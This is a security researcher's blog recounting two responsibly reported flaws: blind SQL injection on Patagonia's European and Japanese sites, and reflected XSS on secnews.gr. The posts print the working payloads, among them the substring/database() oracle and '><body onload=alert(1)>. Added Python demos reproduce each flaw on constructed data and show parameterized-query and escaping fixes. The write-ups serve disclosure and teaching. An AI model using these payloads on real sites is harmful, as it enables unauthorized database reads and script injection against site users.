Wednesday, November 16, 2016

SQL Injection in Patagonia (European and Japanese) Websites

Hello,

I am a nineteen-year-old security researcher who is heavily involved in bug bounties and computer programming. While browsing the European website of Patagonia (eu.patagonia.com) in the fall of 2016, I noticed a GET parameter (?k=) behaving oddly. So I entered a standard ' mark to see how it would respond. Here is what I saw:




This piqued my interest, and I started to think this website would be vulnerable to SQL injection. I began messing with it and attempted to create a PoC of SQL injection. I noticed that when I entered two ' marks, no error would appear and the page would load:




After playing with it for a while longer, I was finally able to craft a working payload! Here it is:

' and substring('a',1,1) like 'a' and 'A' like 'A

returns true (displays an image of a sweater):





' and substring('b',1,1) like 'a' and 'A' like 'A

returns false and displays no image:


Now we can use this to retrieve information such as the name of the database. To find the second character of the string, increment the start position of substring() from 1 to 2, and so on for the remaining characters.

Syntax: ' and substring(database(),1,1) like 'w' and 'A' like 'A



Result: www_patagonia_com
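The mechanism behind the two probes above, reduced to a runnable demonstration. This is an added example and not Patagonia's code: it assumes a search handler that splices the ?k= value into a LIKE clause (the pattern the post implies), uses a constructed two-row catalogue in an in-memory SQLite database, and substitutes SQLite's substr() for MySQL's substring() so it runs with Python's bundled sqlite3 module. The hardened version beside it binds the term as a parameter, which removes the boolean oracle entirely.

```python
import sqlite3

# Constructed demo catalogue; not Patagonia's data or schema.
PRODUCTS = [
    ("Better Sweater", "fleece"),
    ("Torrentshell Jacket", "rain shell"),
]

# The two boolean probes from the post, with SQLite's substr() in place of
# MySQL's substring() so the demo runs against the bundled sqlite3 module.
TRUE_PROBE = "' and substr('a',1,1) like 'a' and 'A' like 'A"
FALSE_PROBE = "' and substr('b',1,1) like 'a' and 'A' like 'A"


def make_db():
    """In-memory catalogue standing in for the site's product table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, category TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", PRODUCTS)
    return conn


def search_vulnerable(conn, k):
    """String-built search: the ?k= value becomes part of the SQL text.

    With k = TRUE_PROBE the WHERE clause reads
        name LIKE '%' AND substr('a',1,1) LIKE 'a' AND 'A' LIKE 'A%'
    which is true for every row, so products come back; with FALSE_PROBE
    the middle term is false and nothing comes back. That difference is
    the oracle the post used to read database() one character at a time.
    """
    sql = f"SELECT name FROM products WHERE name LIKE '%{k}%' ORDER BY name"
    return [row[0] for row in conn.execute(sql)]


def search_parameterized(conn, k):
    """Bound parameter: k reaches the engine as data, never as SQL text."""
    rows = conn.execute(
        "SELECT name FROM products WHERE name LIKE ? ORDER BY name",
        (f"%{k}%",),
    )
    return [row[0] for row in rows]


def oracle_differs(search, conn):
    """True if the two probes produce different result sets through `search`,
    i.e. the endpoint leaks a boolean and is usable as a blind-SQLi oracle.
    Handy as a regression test once the query has been parameterized."""
    return search(conn, TRUE_PROBE) != search(conn, FALSE_PROBE)


if __name__ == "__main__":
    db = make_db()
    for label, fn in [("vulnerable", search_vulnerable),
                      ("parameterized", search_parameterized)]:
        print(f"{label}: plain search  -> {fn(db, 'sweater')}")
        print(f"{label}: true probe    -> {fn(db, TRUE_PROBE)}")
        print(f"{label}: false probe   -> {fn(db, FALSE_PROBE)}")
        print(f"{label}: oracle present? {oracle_differs(fn, db)}")
```

The parameterized search returns nothing for either probe because the whole string is treated as a literal pattern, so there is no true/false difference left to enumerate. The oracle_differs check is the kind of assertion worth keeping in a test suite: it fails loudly if someone later rewrites the query back to string concatenation.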


This also affected the Japanese site!!



After discovering this flaw, I immediately reached out to Patagonia, who patched the bug both quickly and effectively. Finding vulnerabilities and helping American companies is my passion, and I plan on making a career of it one day. Let me know what your thoughts/opinions are in the comments! Thanks :)



Jake Murphy
jakedmurphy1@gmail.com


Saturday, July 2, 2016

Reflected XSS on secnews.gr

For those who don't know, SecNews is a Greek website which informs its visitors about the latest news in the Hacking & IT Security industry. While looking on HackerOne, I noticed they had published a bug bounty program, and decided to take a look. I entered a generic XSS payload (<b onmouseover=alert('test')>test</b>) in the search bar, and was surprised to see the following output:



Unfortunately, when I dragged my mouse over 'test' nothing happened. I tried other payloads, and had no success. Then I thought, why not see if 'test' is being treated as HTML code. So the next payload I entered (<b onmouseover=alert('test')><h1>test</h1></b>) returned:



Now to escalate this to XSS all I had to do was enter <b onmouseover=alert('test')><body onload=alert(1)></b>





Success! After further testing, I reduced the payload to: '><body onload=alert(1)>
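Why a filter that neutralised the first payload still let the last one through, as an added example that is not secnews.gr's code. It assumes a results fragment that reflects the search term inside a single-quoted attribute and again between tags (a constructed template, chosen to match the '> prefix of the reduced payload), and contrasts a denylist tag-stripper with plain HTML entity encoding.

```python
import html
import re

# Constructed results fragment: the search term is reflected inside a
# single-quoted attribute and again as element content. Assumed shape,
# not the site's real template.
TEMPLATE = "<input name='s' value='{q}'> <p>Results for <b>{q}</b></p>"

# Reduced payload from the post.
PAYLOAD = "'><body onload=alert(1)>"


def render_denylist(q: str) -> str:
    """Reflect the term after stripping a couple of 'dangerous' tags.

    A filter of this kind explains the post's observations: some markup is
    removed or neutered, everything it does not recognise is reflected as-is,
    so a tag the list never mentions still reaches the browser live."""
    cleaned = re.sub(r"(?i)</?(script|iframe)[^>]*>", "", q)
    return TEMPLATE.format(q=cleaned)


def render_escaped(q: str) -> str:
    """Reflect the term with HTML entity encoding.

    quote=True also encodes ' and ", so the attribute context cannot be
    closed early and the term can only ever render as text."""
    return TEMPLATE.format(q=html.escape(q, quote=True))


def reflects_raw_tag(rendered: str, tag: str = "body") -> bool:
    """Crude response check a scanner or unit test can use: does an
    unescaped <tag appear in output where the template never emits one?"""
    return f"<{tag}" in rendered.lower()


if __name__ == "__main__":
    for label, fn in [("denylist", render_denylist), ("escaped", render_escaped)]:
        out = fn(PAYLOAD)
        print(f"{label}: {out}")
        print(f"{label}: raw <body> reflected? {reflects_raw_tag(out)}")
```

Entity encoding at output time is the fix; the denylist approach fails open for any tag or attribute it does not list, and in an attribute context it also needs the quotes encoded, which html.escape only does with quote=True.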